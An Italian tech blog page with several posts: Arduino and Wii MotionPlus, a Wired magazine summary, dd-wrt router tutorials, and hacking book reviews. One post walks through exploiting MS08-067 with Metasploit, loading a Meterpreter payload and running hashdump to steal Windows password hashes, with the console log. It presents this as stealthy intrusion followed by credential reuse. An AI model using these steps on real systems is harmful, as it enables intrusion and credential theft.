Wii MotionPlus + Arduino

wiimoteplus

[knuckles904] was able to use the new Wii MotionPlus with an Arduino. Nintendo has released the WM+ in order to detect the motion of the controller better. The Wiimote only detects acceleration, whereas the WM+ detects rotation along 3 axes. The Arduino communicates with it over I2C, the same protocol that is used with the Nunchuk. To connect the two devices, he used jumper wires, but breakout boards are also available. He was able to create some example code with help from wiibrew.org. When paired with a Nunchuk, which contains a 3-axis accelerometer, you can have a 6 degrees-of-freedom IMU for under $40, perfect for controlling your robots or logging data.

[via adafruit]

Wired n.4

wired-06-09

Aimee Mullins: Splendidamente abile

Atleta, modella e oggi anche attrice. Aimee Mullins è stata la musa dello stilista Alexander McQueen e dell’artista visionario Matthew Barney. A un anno ha subito l’amputazione delle gambe. Da allora ha fatto della sua vita una sfida continua. Soprattutto contro i pregiudizi. Ce lo racconta in un articolo scritto apposta per noi.

Hugh Herr: L’impronta dell’evoluzione

Quest’uomo è l’esempio vivente che Darwin aveva ragione. È la conseguenza di come l’ambiente possa trasformare un organismo, adattandolo a ciò che lo circonda. Se fosse nato 50 anni prima sarebbe stato solo un disabile. Oggi questo scienziato americano, che ha perso le gambe da ragazzo, grazie alle sue ricerche può camminare e far camminare tante altre persone come lui. È solo il primo passo verso un’umanità nuova, in cui corpo e macchine si fonderanno in una cosa sola.

Mr. Accelerometro: Un uomo al silicio

Bruno Murari, un genio sconosciuto: l’inventore del microchip che ha fatto la fortuna dell’iPhone raccontato da due protagonisti dell’alta tecnologia italiana, Gianluca Dettori e Elserino Piol.
Piol è da 50 anni nel settore hi-tech, è stato vicepresidente di Olivetti e ha lanciato Omnitel e molte altre aziende del settore informatico.

Sub Wars: dal tramonto all’alba traducendo Lost

«La gente della notte fa lavori strani», diceva Jovanotti, ma non aveva ancora visto i sottotitolatori.

Tecno-sciamani (seconda parte)

Alla ricerca di una cura soterica per un mal di schiena cronico

howardschatz2

Come Prelevare le Password di Windows da Remoto

Craccare le password di Windows è ormai un gioco da ragazzi. Addirittura con Kon-Boot è possibile loggarsi in qualsiasi Linux o Windows aggirando il meccanismo di autenticazione. Tutto questo a patto che si abbia accesso fisico alla macchina. Se il computer dal quale vogliamo prelevare (e quindi craccare) le password si trova in un luogo a noi inaccessibile (o in un altro continente…) le cose si complicano. Ma non troppo.

Questo articolo completa un precedente post: “Hackerare Windows con Metasploit“. Chi se lo è perso se lo vada a rileggere e poi si iscriva a PillolHacking.Net per evitare di perdere i prossimi articoli.

Nel suddetto articolo viene mostrato come accedere da remoto a Windows sfruttando un recente bug, utilizzando Metasploit Framework, potentissimo strumento per effettuare penetration test.
Il precedente articolo si fermava dopo avere effettuato l’intrusione. Questa volta parliamo di cosa fare dopo aver effettuato un accesso remoto sulla macchina target.

Avere accesso ad una shell Windows da remoto è molto utile e si possono già fare diverse cose per mantenere un accesso anche nel caso in cui il bug venisse patchato. Ricordo che entrare continuamente in un computer tramite un exploit non è un’idea brillante, per diversi motivi. Uno di questi è che  aumenta il rischio di essere scoperti, e può bastare.
Quindi una volta entrati in un sistema è possibile installare una backdoor. Per esempio è possibile aggiungere un utente con privilegi di amministratore. Ma qualsiasi backdoor può essere scoperta.

Il modo migliore per effettuare un’intrusione furtiva, da autentico fantasma della rete, è entrare, prelevare il SAM database, ovvero il file dove vengono memorizzate le password cifrate, craccarle e tornare nel sistema come un qualsiasi utente autorizzato, il tutto senza dare nell’occhio. Per non dimenticare un altro aspetto del password cracking: spesso gli utenti usano la stessa password per diversi servizi/sistemi. Recuperando la password di un sistema può aprire le porte a sistemi ben più preziosi all’interno di una organizzazione.

Per ottenere il nostro scopo, ovvero prelevare il SAM database da remoto utilizzeremo uno strumento spettacolare: Meterpreter. Si tratta di un modulo di Metasploit per la fase di post-penetration. Viene iniettato direttamente dall’exploit nel sistema remoto e mette a disposizione dell’hacker un ambiente in grado di effettuare qualsiasi operazione sul sistema target. Prima della nascita di Meterpreter questa fase era assai più complessa, visto che prevede la necessità di caricare in qualche modo tools aggiuntivi sul server. Con Meterpreter non serve nulla. Eventuali nuovi moduli possono essere caricati con un semplice comando.

Torniamo alle password. Per recuperare il SAM database della macchina target utilizziamo il comando hashdump di Meterpreter. L’operazione è semplicissima: una volta effettuata l’intrusione è necessario attivare il modulo priv (user priv) e di seguito invocare il comando hashdump.
Per quanto riguarda i dettagli per effettuare l’intrusione rimando all’articolo già citato. La differenza da quell’aticolo è il payload utilizzato. Se in quell’occasione avevo utilizzato un semplice shell/bind_tcp:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp

Questa volta uso meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

Questo è il log dell’esecuzione dell’exploit contro il mio Xp virtualizzato, la macchina più vulnerabile del pianeta, il cui indirizzo Ip è 192.168.132.128; la macchina dell’attaccante è una Batcktrack3 con Ip 192.168.132.129; l’exploit è il ms08_067_netapi:


[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Italian
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.129:58221 -> 192.168.132.128:4444)

meterpreter > use priv
[-] The ‘priv’ extension has already been loaded.
meterpreter > hashdump
Administrator:500:68a828b9dbd542feaad3b435b51404ee:0ebd3febdb972b9d9a164b72f321e341:::
pippo:1004:68a828b9dbd542feaad3b435b51404ee:0ebd3febdb972b9d9a164b72f321e341:::
meterpreter >

Il gioco è fatto! Il dump del SAM database è stato effettuato. A questo punto non rimane che passare alla fase di cracking.

Asus wl-500gp v2 e dd-wrt (sesta parte): Download machine con Bittorrent

transmission-logoDopo avere visto nella quinta parte come installare aMule sull’Asus wl500gp v2 questa volta passiamo a Bittorrent grazie al pacchetto transmission presente sui repository di optware.

Per potere installare transmission dobbiamo avere l’ambiente optware installato sul nostro router, per ulteriori approfondimenti rimando al post Asus wl-500gp v2 e dd-wrt (terza parte): Nas con samba2, swat e optware. Altro presupposto è l’avere una partizione di swap attiva per non in incorre in problemi di memoria, anche per questo rimando al solito post.

Per l’installazione e configurazione mi sono rifatto alla guida presente su http://www.dd-wrt.com/wiki/index.php/Transmission_daemon

Per eseguire l’installazione basta accedere alla shell del router con ssh/telnet e impartire il seguente comando:

/opt/bin/ipkg install transmission

Continue reading “Asus wl-500gp v2 e dd-wrt (sesta parte): Download machine con Bittorrent”

Windows e drivers sconosciuti

Alcune note riguardo la manutenzione di un sistema windos che necessita l’installazione dei driver.

Come trovare i driver per Windows partendo solo dal bollo giallo in Gestione Periferiche

Su spippolazine possiamo trovare un interessante articolo per riuscire a capire quali sono i driver da installare a partire dal bollino giallo con il punto esclamativo che windows utilizza in “Gestione periferiche” per identificare una periferica non installata.

Database hardware

Avendo l’id del vendor e l’id del devide su http://www.pcidatabase.com/ è possibile interrogare un database per recuperare informazini su tale hardware.

Database drivers

Invece su http://www.nodevice.com/ abbiamo un database di drivers windows per un’infinià di periferiche.

Asus wl-500gp v2 e dd-wrt (quinta parte): Download machine con aMule

amuleIn questa quinta parte provo a descrive come trasformare il nostro router in una download machine grazie a aMule. Questo viene installato grazie ai repository di optware, che naturalmente deve essere già presente sul sistema. Altra prerogativa per fare funzionare il tutto è avere una partizione di swap attiva in quanto i 32MB del wl-500gpv2 non sono sufficienti per amule. Per installare optware e attivare la partizione di swap fate rifierimento alla terza parte dedicata all’Asus wl-500gp v2 e dd-wrt.

Per eseguire l’installazione di aMule dobbiamo accedere alla shell di dd-wrt (con ssh o telnet) e impartire il seguente comando:

/opt/bin/ipkg install amule

terminate l’installazione saranno presenti sul sistema i comandi amuled, amuleweb e amulecmd.

Continue reading “Asus wl-500gp v2 e dd-wrt (quinta parte): Download machine con aMule”

Spaghetti Hacker

spaghetti-hacker

Tratto da Wikipedia

Spaghetti Hacker è ad oggi l’unico testo, per quanto oramai datato, che ha raccolto e documentato la storia “non ufficiale” della telematica italiana ed è stato il testo di riferimento per la prima generazione di hacker italiani e per chi aveva necessità di informazioni su un mondo, ora più “accessibile”, ma all’epoca praticamente ignoto.

La caratteristica del libro è innanzi tutto quella di avere dato spazio ai protagonisti, nel senso che una parte consistente delle informazioni che fornisce sono state acquisite dagli autori con interviste dirette. Inoltre, e anche in questo Spaghetti Hacker ha inaugurato un “genere”, miscela gli aspetti tecnici con quelli giuridici, secondo una formula che sarebbe stata ripresa, negli anni a venire, da molti altri libri. Spiegando in modo semplice le tecnicalità del linguaggio legale, il libro evidenzia, quasi con facoltà precognitive, i potenziali pericoli per la libertà della rete (censura, repressione, ottusità dei politici) che oggi si sono puntualmente verificati.

Titolo: Spaghetti Hacker
Autore: Stefano Chiccarelli, Andrea Monti
Ediore: Apogeo / 1997

L’arte dell’intrusione

arte-intrusione

In breve

“Entrate nell’ostico mondo dell’hacking seduti nella vostra comoda poltrona! Mitnick illustra con grande abilità dieci casi reali, offrendoci la rara occasione di poter penetrare nella mentalità degli hacker.” Tom Parker, analista di sicurezza informatica, fondatore della Global InterSec llc

Il libro

Mitnick offre con questo libro un sequel all’ormai celebre L’arte dell’inganno, questa volta intervistando una serie di gruppi hacker che hanno messo in atto alcune delle intrusioni più incredibili degli ultimi anni.
Ogni capitolo (dieci in totale) si apre con una “computer crime story” che si legge come un romanzo. Certo, è sicuramente sconcertante capire quanto sia vulnerabile il proprio conto in banca o vedere all’opera un gruppo di hacker innamorati del gioco d’azzardo che in pochi minuti fanno man bassa delle slot machine.
Come nell’Arte dell’inganno, nel raccontare queste storie, Mitnick illustra minuziosamente i passi tecnici utilizzati nel mettere a segno i diversi colpi.
Un libro che si legge con facilità e che, al contempo, ci proietta nel mondo della sicurezza, l’altra faccia della dimensione informatica in cui Mitnick è ormai impegnato come uno dei maggiori esperti mondiali.

Titolo: L’arte dell’intrusione
Autore: Kevin D. Mitnick
Ediore: Mondadori / 2008
Pagine: 304

Vedi anteprima su Google Books.